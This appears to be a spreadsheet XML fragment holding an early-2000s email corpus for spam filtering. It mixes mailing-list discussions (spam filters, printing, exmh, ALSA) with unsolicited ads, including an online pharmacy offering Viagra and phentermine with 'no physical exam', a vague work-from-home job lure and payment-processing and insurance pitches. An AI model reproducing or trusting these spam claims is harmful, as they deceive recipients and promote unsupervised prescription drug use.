 ZXI+PGJyPjxhIGhyZWY9Imh0dHA6Ly93d3cudnN0b3JlLmNvbS9jZ2ktYmlu
 L3BhZ2VnZW4vdnN0b3Jlc3BvcnRzL2JlbG93d2hvbGVzYWxlc3BvcnRzL3Bh
 Z2UuaHRtbD9tb2RlPWl0ZW1wYWdlJmZpbGU9L3BhZ2UvaXRlbXBhZ2V2NC9p
 dGVtcGFnZS5zcGwmcHJvZElEPTE0MDAwNDIiPjxpbWcgc3JjPSIvYWx0X2lt
 YWdlcy8yMDAwLzE0MDAwNDJfNzVfNzUuanBnIiBib3JkZXI9MD48L2E+PEJS
 PiA8Zm9udCBmYWNlPWFyaWFsIHNpemU9Mj48Yj5OQ0FBIEZpbmFsIEZvdXIg
 MjAwMTwvYj48YnI+ICA8Zm9udCBzaXplPSIxIj5Pbmx5OiA8L2ZvbnQ+IDxh
 IGhyZWY9Imh0dHA6Ly93d3cudnN0b3JlLmNvbS9jZ2ktYmluL3BhZ2VnZW4v
 dnN0b3Jlc3BvcnRzL2JlbG93d2hvbGVzYWxlc3BvcnRzL3BhZ2UuaHRtbD9t
 b2RlPWl0ZW1wYWdlJmZpbGU9L3BhZ2UvaXRlbXBhZ2V2NC9pdGVtcGFnZS5z
 cGwmcHJvZElEPTE0MDAwNDIiPjxiPiQzOS45OTwvYj48L2E+PC9mb250PiA8
 YnI+PGJyPiAgPGNlbnRlcj48Zm9udCBzaXplPTEgZmFjZT0iYXJpYWwiPjxh
 IGhyZWY9Imh0dHA6Ly93d3cudnN0b3JlLmNvbS9jZ2ktYmluL3BhZ2VnZW4v
 dnN0b3Jlc3BvcnRzL2JlbG93d2hvbGVzYWxlc3BvcnRzL3BhZ2UuaHRtbD9t
 b2RlPXByb2R1Y3RzJmZpbGU9L3BhZ2UvcHJvZGxpc3R2NC9wcm9kdWN0bGlz
 dC5zcGwmY2F0SUQ9MjgxMzEiPk1vcmUgVmlkZW8gR2FtZXM8L2E+PC9mb250
 PjwvY2VudGVyPjwvdGQ+IDwvdHI+ICA8L3RhYmxlPiANDQo8L2ZvbnQ+DQ0K
 DQ0KDQ0KDQ0KPC90ZD48L3RyPjwvdGFibGU+DQ0KCQ0NCgkNDQogIDwvdGQ+
 DQ0KICA8dGQgYmdjb2xvcj0iIzAwMDA2NiIgd2lkdGg9IjEiPjxpbWcgYm9y
 ZGVyPSIwIiBzcmM9Ii9pbWFnZXMvc3BjbGVhci5naWYiIHdpZHRoPSIxIiBo
 ZWlnaHQ9IjEiPjwvdGQ+DQ0KPC90cj4NDQo8dHI+DQ0KICA8dGQgQ09MU1BB
 Tj0iMyI+PGltZyBib3JkZXI9IjAiIHNyYz0iL2ltYWdlcy8xNjQ3LzE3MzIv
 MTY4OC9zYl9mb290ZXIuZ2lmIiB3aWR0aD0xNDYgaGVpZ2h0PTE1PjwvdGQ+
 DQ0KPC90cj4gICANDQo8L3RhYmxlPg0NCjwvdGQ+PC90cj4NDQo8L3RhYmxl
 Pg0NCjwhLS0gL2NhdGxheW91dCAtLT4NDQoNDQo8L2NlbnRlcj4NDQo8IS0t
 IC9yaWdodGJhciAtLT4NDQoNDQogICZuYnNwOw0NCiAgJm5ic3A7DQ0KICAm
 bmJzcDsNDQogIDwvdGQ+DQ0KPC90cj4NDQo8L3RhYmxlPg0NCjwvQk9EWT4N
 DQo8L0hUTUw+DQ0K
 --= Multipart Boundary 0626010800--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Payment processing - 8% flat fee
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
    &lt;title&gt;The Soft2Reg Team&lt;/title&gt;
 &lt;/head&gt;
 &lt;link rel=STYLESHEET type=text/css href=css/main.css&gt;
 &lt;STYLE type=text/css&gt;
 .Black11 {FONT-SIZE: 11px; COLOR: black; FONT-FAMILY: Verdana;  FONT-WEIGHT: normal; TEXT-DECORATION: none}
 .Red13 {font-size : 13px; font-family :Verdana, Arial, Helvetica, sans-serif;font-weight : bold;color : Red}
 &lt;/style&gt;
 &lt;body bgcolor=ffffff&gt;
 &lt;center&gt;
 &lt;table border=0 width=600 cellpadding=2 cellspacing=0&gt;
 	&lt;tr&gt;
 		&lt;td width=275&gt;
 			&lt;a href=http://www.soft2reg.com&gt;
 				&lt;img src=http://www.soft2reg.com/images/logo.gif border=0 alt=www.soft2reg &gt;&lt;/a&gt;
 		&lt;/td&gt;
 		&lt;td align=right width=100%&gt;
 			&lt;hr size=0&gt;
 		&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;
 &lt;table border=0 width=600 cellpadding=4 cellspacing=0 bgcolor=6699cc&gt;
 	&lt;tr&gt;
 		&lt;td&gt;
 			&lt;font face=arial size=+1 color=000000&gt;
 				&lt;b&gt;Soft2reg.com -- Service Update&lt;/b&gt;&lt;/font&gt;
 		&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;
 &lt;table border=0 width=600 cellpadding=4 cellspacing=0&gt;
 	&lt;tr&gt;
 		&lt;td class=Black11&gt;
 			Hello,&lt;br&gt;&lt;br&gt;
 			&lt;br&gt;We apologize for the unsolicited e-mail, 
 				but we have noticed that you are using an online credit card processor on your web 
 				site that charges you much more than what you should be paying.
  			&lt;br&gt;&lt;br&gt;
 				We are Soft2Reg.com and we &lt;b&gt;specialize in low cost online credit 
 				card processing for developers of electronic products&lt;/b&gt;. 
 				Our rates are the lowest in the industry - &lt;span class=Red13&gt;8% flat fee&lt;/span&gt; for all online credit card transactions. 
 				We provide you with a link for every one of your products that contains your logo and you put it on your web site for seamless credit card processing integration. For that simple, yet efficient service we charge only 8% of your online sales.
 			&lt;br&gt;&lt;br&gt;
 			If you would like to see more information about us, please visit &lt;a href=http://www.soft2reg.com&gt;http://www.soft2reg.com&lt;/a&gt;.
 			&lt;br&gt;&lt;br&gt;
 			&lt;HR noShade SIZE=1&gt;
 			&lt;br&gt;Thank you,
 			&lt;br&gt;The Soft2Reg Team
 			&lt;br&gt;-----------------------------------
 			&lt;br&gt;&lt;a href=http://www.soft2reg.com&gt;www.soft2reg.com&lt;/a&gt;.
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: whoa
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This just blew my mind:
 http://www.earthviewer.com/
 The detail of my neighborhood -- even my building -- is unbelievable.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] Re: keep submitting known spam?
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 Ok, time for me to pipe in.  :)
 Honestly, I find it odd that the spam fighting groups aren't working
 and playing well, when the common enemy is the spammers, not each
 other.  MAPS and ORBS had a battle for a while, and now DCC seems to
 have issues with Razor.  Honestly, work on your own stuff, and let's
 fix the spam problem, not pull out rulers.
 In a spam filter, I'm much, much more concerned about false positives
 than false negatives.  Additionally, since spam types are so varied, I
 use all available and trustworthy (to me) methods to detect it.  I
 tend to want something that has three levels (although nothing like
 this exists, yet):
         red     is most certainly spam, verified by high ratings from
                 several sources, and noone says "I know this is NOT
                 spam."  I'd probably drop this into a bit-bucket, or
                 archive it for humor value.  I expect no
                 false-positives to be here.
         yellow  This may be spam.  A human should decide (and report).
         green   This is probably not spam.
 spamassassin does something useful here, but it only has the is/isn't
 switch, not is/maybe/isn't.  That said, razor is but one check in my
 spam fighting arsenal, so if it reports "doesn't match known spam"
 once in a while for well-known spam, something else will probably get
 it.
 - --Michael
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (NetBSD)
 Comment: See http://www.flame.org/~explorer/pgp for my keys
 iD8DBQE9Uxknl6Nz7kJWYWYRAqZVAKCAD46joOEZbIk+8Hx3ZGkVQ7eGZwCfRB+V
 T67XLOPP4vG99Fg2h72gHek=
 =Evue
 -----END PGP SIGNATURE-----
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: flavor cystals
</t>
  </si>
  <si>
    <t xml:space="preserve">Can anyone stop talking politics long enough to let me know that,
 yes, indeed, they do remember the Suburban Lawns?
 Better yet, tell me where I should be listening for new music now that
 P2P is dead and I still can't pick up KFJC very well.
 - Joe
 -- 
 Give me time I will be clear; given time you'll understand.
 What possesses me to right what you have suffered.
 I'm in this mood because of scorn; I'm in a mood for total war.
 To the darkened skies once more and ever onward.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] cups question
</t>
  </si>
  <si>
    <t xml:space="preserve">zzzz@spamassassin.taint.org (Justin Mason) writes:
 &gt; /dev/fd/0 is STDIN -- filedescriptor 0.  Looks like the PS file wants
 &gt; to know its filename, but it's being read from STDIN, that's my
 &gt; guess.  
 I don't think so: it should be getting a stream of PS from stdin,
 but it's not. The printing/spooling system is executing gs but
 somehow failing to provide it with input.
 &gt; Try tweaking the scripts to run "gs" with the ps file on
 &gt; the command line instead of as "-".
 That might clarify that the later part of the system works, but I
 suspect the problem is earlier.
 B
 -- 
 Brendan Halpin, Dept of Government and Society, Limerick University, Ireland
 Tel: w +353-61-213147 f +353-61-202569 h +353-61-390476;  Room F2-025 x 3147
 &lt;mailto:brendan.halpin@ul.ie&gt;        &lt;http://wivenhoe.staff8.ul.ie/~brendan&gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Russell Turpin wrote:
 &gt; On the receiving side,
 &gt; my email client distinguishes between messages
 &gt; that are read, and messages that are not. I like
 &gt; to mark or save messages that are particularly
 &gt; interresting or important to me. And even if I
 &gt; make a point to delete "suspicious material"
 &gt; immediately upon reading it, even THAT might
 &gt; leave an interesting kind of trace on my machine.
 You choose to have your email client do that.  You don't have to.  Short
 of Palladium, you can do whatever you want with bytes you hold, including
 reading messages and erasing the traces.  I'll buy a chocolate sundae for
 anyone who can show otherwise.
 An attacker might be able to verify that you *have* read a message (e.g.  
 by seeing that you saved and edited a copy) but not that you *haven't*.  
 If your email client was compromised you could put a packet sniffer on the
 line before downloading mail.  If an attacker installed a packet sniffer
 sniffer, you could run it in a spoofing VM.
 The only exception to the rule that your machine belongs to you is --
 maybe -- Palladium.
 - Lucas
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Phentermine &amp; Viagra Here
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
    &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
    &lt;title&gt;Lowest Viagra Prices Online!&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table COLS=1 WIDTH="538" &gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font face="Arial,Helvetica"&gt;We are the largest U.S. Company specializing
 in prescriptions for &lt;b&gt;&lt;font color="#3333FF"&gt;&lt;a href="http://www.1-stopshop.net"&gt;VIAGRA&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;,
 weight loss management and other FDA approved medications.&amp;nbsp;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Arial,Helvetica"&gt;It has never been easier to get &lt;b&gt;&lt;font color="#3366FF"&gt;&lt;a href="http://www.1-stopshop.net"&gt;Viagra&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;.&amp;nbsp;&lt;/font&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;No Physical Exam Necessary!&lt;/font&gt;&lt;/b&gt;
 &lt;ul&gt;
 &lt;li&gt;
 &lt;font face="Arial,Helvetica"&gt;Free online consultation&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;
 &lt;font face="Arial,Helvetica"&gt;Fully confidential&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;
 &lt;font face="Arial,Helvetica"&gt;No embarassment&amp;nbsp;&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;
 &lt;font face="Arial,Helvetica"&gt;No appointments&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;
 &lt;font face="Arial,Helvetica"&gt;Secure ordering&amp;nbsp;&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;
 &lt;font face="Arial,Helvetica"&gt;Discreet and overnight shipping&amp;nbsp;&lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;br&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font color="#CC0000"&gt;&lt;a href="http://www.1-stopshop.net"&gt;GUARANTEED
 LOWEST PRICES.&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;BURN FAT AND LOSE WEIGHT FAST WITH
 &lt;a href="http://www.1-stopshop.net"&gt;PHENTERMINE!&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;p&gt;&lt;font face="Arial,Helvetica"&gt;&lt;b&gt;&lt;a href="http://www.1-stopshop.net"&gt;Click
 here&lt;/a&gt;&lt;/b&gt; to visit our online pharmacy.&lt;/font&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;p&gt;&lt;font face="Arial,Helvetica"&gt;To be excluded from our mailing list, &lt;b&gt;&lt;a href="mailto:removeme99@btamail.net.cn?subject=remove from viagra"&gt;CLICK
 HERE&lt;/a&gt;&lt;/b&gt;.&amp;nbsp; You will then be automatically deleted from future
 mailings.&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 4992bjBX6-633aiSn5903nCZm6-773Sjjb9427YRYb1-371xFWB1146ehQR4-872LoOl63
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: False teeth to fake limbs, crazy things left behind in hotels
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8404724,1717/
 Date: 2002-09-30T19:18:24+01:00
 (canada.com)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: NYTimes.com Article: Why We're So Nice: We're Wired to Cooperate
</t>
  </si>
  <si>
    <t xml:space="preserve">From: Win Treese &lt;treese@acm.org&gt;
 &gt; And Owen replied:
 &gt; &gt; Well, IMNHO, its because companies do not reward knowledge sharers.
 &gt;
 &gt; I don't work in this area, but I have a suspicion that many people
 &gt; suspect projects for "knowledge management" and "knowledge sharing" as
 &gt; attempts to eliminate their jobs, or at least their importance. If "the
 &gt; organization" knows all the things I know, why does it need me?
 I agree wholeheartedly.  It is easier to sit on knowledge than to
 continually acquire more on the frontiers.
 &gt; This should actually be easy to test experimentally: compare the results
 &gt; of having someone call up and say, "Can you show us how to do X for this
 &gt; project we're working on?" with those of having someone summoned by a
 &gt; knowledge management project to explain how to do X for the knowledge
 &gt; archives.
 This is in fact very true.  People hate doing this for several reasons in
 my experience:
 1) "Software changes.   Why waste time writing a FAQ now that will be out
 of date at the next release in 3 months?"
 2) "This knowledge is specialized.  Only 4 people need to know this, and
 they already do.  If anyone else needs to know it they know who they can
 call."
 The same engineers who give these excuses will spend eternities on the
 phone discussing this arcana and sharing the knowledge with anyone who has
 the patience to ask.
 The strongest contributors freely share everything they know whenever
 asked (or whenever they see the need for the information in the company)
 and who at the same time continue to generate new knowledge.
 Personal evaluation: my worth comes slightly lower on the scale in that I
 synthesize the knowledge from various personal sharing exercises into
 usable documents and messages for the company to employ.  This would seem
 like a marketing exercise except that Marketing is useless.   Useful
 knowledge sharing comes (IMHO) from engineering and sales.
 	JTS
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Chuck Murcko wrote:
 &gt; &gt; The usual crud.  Why do morons ranting and beating their chests in the
 &gt; &gt; National Review (or similar rags) merit FoRKing?
 &gt; Probably because we have this pesky 1st Amendment thing here.  [...]
 It must be so great in the US.  The rest of us live in caves and have
 no such thing as free speech.
 BTW, I wasn't aware that the 1st Amendment mandated that crap must be FoRKed.
 &gt; You can just ignore it if you wish.
 I will, thanks.
 &gt; But I must feel obligated to defend to the death your right to do so.
 Je dsapprouve ce que vous dites, mais je dfendrai jusqu' ma mort votre
 droit de le dire
 - Arouet Le Jeune, dit Voltaire (1694-1778).
 R
</t>
  </si>
  <si>
    <t xml:space="preserve">"Oh my Janitor, boom, boom, boom."
 The best place for new music is right where it's
 always been. College radio.   UCI, UCSD,USD, Claremont(?)'s
 KSPC, UCLA, Cal Fullerton, Cal LA, Cal Pomona.
 Greg
 Joseph S. Barrera III wrote:
 &gt; Can anyone stop talking politics long enough to let me know that,
 &gt; yes, indeed, they do remember the Suburban Lawns?
 &gt; 
 &gt; Better yet, tell me where I should be listening for new music now that
 &gt; P2P is dead and I still can't pick up KFJC very well.
 &gt; 
 &gt; - Joe
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: A couple of nits...
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-1581861840P
 Content-Type: text/plain; charset=us-ascii
 On Wed, 02 Oct 2002 09:54:04 EDT, "J. W. Ballantine" &lt;jwb@homer.att.com&gt;  said:
 &gt; First, when I try and run exmh with wish from tk8.4.0 it seems to take
 &gt; forever to start, but with wish from tk8.a.4 it starts in a snap.
 This sounds like something piggy in the 'flist' code - I'm seeing flist
 in general taking 5-10 seconds.  Interesting that a different wish comes up
 fast, there might be a borkedness in 8.4.
 &gt; Using the latest CVS, when I open exmh and the folder I'm in has unseen
 &gt; messages and I hit next, exmh changes to the next folder with unseen messages
 &gt; rather than to the first unseen in the current folder.
 Hmm.. weirdness..
 &gt; Finally, when I reach the end of the messages in a folder and go on to
 &gt; the next unseen, exmh always goes back to inbox (which has no unseen
 &gt; messages) rather than the next folder with unseen messages.  (When I 
 &gt; goto next from inbox it does go where I would think it should go).
 I've been seeing this as well - *usually* with inbox, but it's gotten
 stuck on some other folders as well (I have procmail do rcvstore into folders
 for me).
 -- 
 				Valdis Kletnieks
 				Computer Systems Senior Engineer
 				Virginia Tech
 --==_Exmh_-1581861840P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 Comment: Exmh version 2.5 07/13/2001
 iD8DBQE9mwd0cC3lWbTT17ARAsOKAKCe3ziHYPQnWBGyUdYQzYurE1tguACfS9Ms
 TUQI8ndQ8stuJqaWVGSAi4k=
 =JBgX
 -----END PGP SIGNATURE-----
 --==_Exmh_-1581861840P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ville wrote :
 &gt; &gt; Thanks a *lot* !  The RPMs seem to be fine, they worked for me out of
 &gt; &gt; the box (on vanilla Valhalla w/latest errata).
 &gt; 
 &gt; ...except that I don't see an init script in the RPMs, a sample one
 &gt; designed for RH is supposed to be in "utils/alsasound".  Could you take
 &gt; a look if it can be included?
 It doesn't need to as Red Hat Linux already sets correct permissions on all
 ALSA audio devices for locally logged in users (through the console.perms
 file) and the modules.conf files takes care of loading the right modules on
 demand. Also, aumix and the scripts that come with Red Hat Linux still work
 for controlling the volume, so it's still saved and restored when the
 computer is halted, even using ALSA.
 I'm glad you got your card working with these! I'm now wondering if I won't
 maybe buy an amplifier that supports Dolby Digial decoding (my current one
 "only" does PRo Logic) since I've read that ALSA supports the S/PDIF
 optical output of the sound chip of my Shuttle!
 (http://freshrpms.net/shuttle/)
 &gt;&gt;From what I can tell after only 2 days using it : ALSA rocks, especially
 since having a full OSS compatibility results that it breaks nothing at
 all!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</si>
  <si>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Play by Play: Effective Memory Management
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,6503039,159/
 Date: 2002-08-03T08:11:17+01:00
 Back when 64KB was more memory than any computer would ever need, there was a 
 time when memory managers didnt exist. But gradually, new computer systems 
 came out with larger amounts of memory and designers discovered ways to eat up 
 RAM faster than any system could dish it out. This discussion is based on 
 Tiburon's experiences in writing and rewriting the memory manager for Madden 
 NFL 97 to Madden NFL 2002.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FORTUNE 500 COMPANY HIRING, AT HOME REPS.
</t>
  </si>
  <si>
    <t xml:space="preserve">Help wanted.  We are a 14 year old fortune 500 company, that is
 growing at a tremendous rate.  We are looking for individuals who
 want to work from home.
 This is an opportunity to make an excellent income.  No experience
 is required.  We will train you.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://www.basetel.com/wealthnow
 We are looking for energetic and self motivated people.  If that is you
 than click on the link and fill out the form, and one of our
 employement specialist will contact you.
 To be removed from our link simple go to:
 http://www.basetel.com/remove.html
 4139vOLW7-758DoDY1425FRhM1-764SMFc8513fCsLl40
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Internet Archive bookmobile
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 30 Sep 2002, Tom wrote:
 &gt; If the set passes around enough then more people have these works. the
 &gt; more folks  that have them now, while they are still legal to have, the
 &gt; likely they  will be left behind in the possible/probabale copyright
 &gt; chillout..and if  that doesnt happen then more folks than not will still
 We will be getting BlackNet-like guerilla P2P pretty soon. Packaging it 
 into wormcode with an initial userbase of a few 100 k to Mnodes gives you 
 pretty bulletproof plausible deniability.
 &gt; have it for uses all manner of shades.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Best Critical Illness Policy on the Market
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_428CD_01C24DE6.6DD2E5F0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  The best critical illness product on the market. Period.
  National Travelers Life Insurance Company
  Immediate Payment Upon Diagnosis!
  15 valuable lifetime benefits
 100% of the Face Amount	 
 Heart Attack	 Stroke	 Invasive Cancer	 HIV (for Medical
 Personnel)	 
 Paralysis	 Organ Transplant	 Severe Burns	 Loss of
 Independent Living	 
 Terminal Illness	 Kidney Failure	 Blindness	 Death By Any
 Cause	 
 25% of the Face Amount	 
 Coronary Artery Bypass	 Non-invasive Cancer	 
 10% of the Face Amount	 
 Coronary Angioplasty	 
 Worksite Marketing	 Individual Sales	 
 ? Guaranteed Issue for Groups of 25+	 ? Up to $1,000,000 maximum
 ? Electronic Enrollment	 ? Simplified Issue up to $100,000	 
 ? Unlimited billing options	 ? Up to 75% advance	 
  Don't forget to ask about our matching retirement plan!	
 To learn more, please call us today!
  800-626-7980
 ? or ? 	
 Please fill out the form below for more information	 
 Name:	 	 
 Address:	 	 
 City:	 	 State:	 	 Zip:	 	 
 E-mail:	 	 
 Phone:	 	 
 Area of Interest:	  Worksite        Individual Sales 	 Both 	
  	  Personal Producer      Manager 	 Number of Agents 	
  National Traveler's Life Co.	
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insuranceiq.com/optout
 &lt;http://www.Insuranceiq.com/optout/&gt; 
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  
 ------=_NextPart_000_428CD_01C24DE6.6DD2E5F0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;The Best Critical Illness Policy on the Market&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 bgcolor=3D"#ffffff" border=3D"1" bordercolor=3D"#000000" =
 align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;&lt;img src=3D"http://iiq.us/images/ntl/20020806-101.jpg" =
 alt=3D"The best critical illness product on the market. Period." =
 width=3D"550" height=3D"93"&gt;&lt;br&gt;&lt;img =
 src=3D"http://iiq.us/images/ntl/20020806-102.jpg" alt=3D"National =
 Travelers Life Insurance Company" width=3D"550" height=3D"261"&gt;&lt;br&gt;&lt;img =
 src=3D"http://iiq.us/images/ntl/20020806-103.gif" width=3D"550" =
 height=3D"11"&gt;&lt;br&gt;
 		  &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;img src=3D"http://iiq.us/images/ntl/20020514-6c.gif" =
 width=3D"463" height=3D"60" alt=3D"Immediate Payment Upon =
 Diagnosis!"&gt;&lt;br&gt;=20
             &lt;img src=3D"http://iiq.us/images/ntl/20020617-1.gif" =
 width=3D"435" height=3D"105" alt=3D"15 valuable lifetime benefits"&gt;&lt;br&gt;=20
             &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;=20
             &lt;table width=3D"100%" border=3D"1" cellspacing=3D"0" =
 cellpadding=3D"2" bordercolor=3D"#000000" bgcolor=3D"#CCCCCC"&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"4" bgcolor=3D"#333366" =
 align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"2" color=3D"#FFFFFF"&gt;100% of the Face =
 Amount&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td height=3D"22"&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Heart =
 Attack&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td height=3D"22"&gt;&lt;b&gt;&lt;font =
 size=3D"1"&gt;Stroke&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td height=3D"22"&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Invasive =
 Cancer&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td height=3D"22"&gt;&lt;b&gt;&lt;font size=3D"1"&gt;HIV (for Medical =
 Personnel)&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Paralysis&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Organ Transplant&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Severe Burns&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Loss of Independent =
 Living&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Terminal Illness&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Kidney Failure&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Blindness&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Death By Any =
 Cause&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"4" bgcolor=3D"#FFFFFF" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/ntl/spacer.gif" =
 width=3D"8" height=3D"8"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"4" bgcolor=3D"#333366" =
 align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"2" color=3D"#FFFFFF"&gt;25% of the Face =
 Amount&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td colspan=3D"2"&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Coronary Artery =
 Bypass&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td colspan=3D"2"&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Non-invasive =
 Cancer&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td colspan=3D"4" bgcolor=3D"#FFFFFF"&gt;&lt;img =
 src=3D"http://iiq.us/images/ntl/spacer.gif" width=3D"8" =
 height=3D"8"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td colspan=3D"4" bgcolor=3D"#333366"&gt;&lt;b&gt;&lt;font =
 size=3D"2" color=3D"#FFFFFF"&gt;10% of the Face Amount&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td colspan=3D"4"&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Coronary =
 Angioplasty&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
